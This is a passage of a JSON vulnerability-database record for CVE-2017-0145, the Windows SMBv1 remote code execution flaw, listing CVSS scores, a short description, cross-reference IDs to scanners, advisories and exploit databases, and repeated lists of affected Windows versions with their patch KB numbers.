8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T02:45:21", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB3210721", "KB3205409", "KB4012214", "KB4012215", "KB3177186", "KB4012598", "KB4013198", "KB4012216", "KB4012212", "KB4013429", "KB4012606", "KB3205401", "KB4012213", "KBMS16-110, 3187754", "KB4014077", "KB3212646", "KB4012217", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T02:45:21", "differentElements": ["msAffectedSoftware"], "edition": 67}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "32dd1c2d5f94ad64bc33322ba051cb15", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T04:47:39", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB4014077", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, 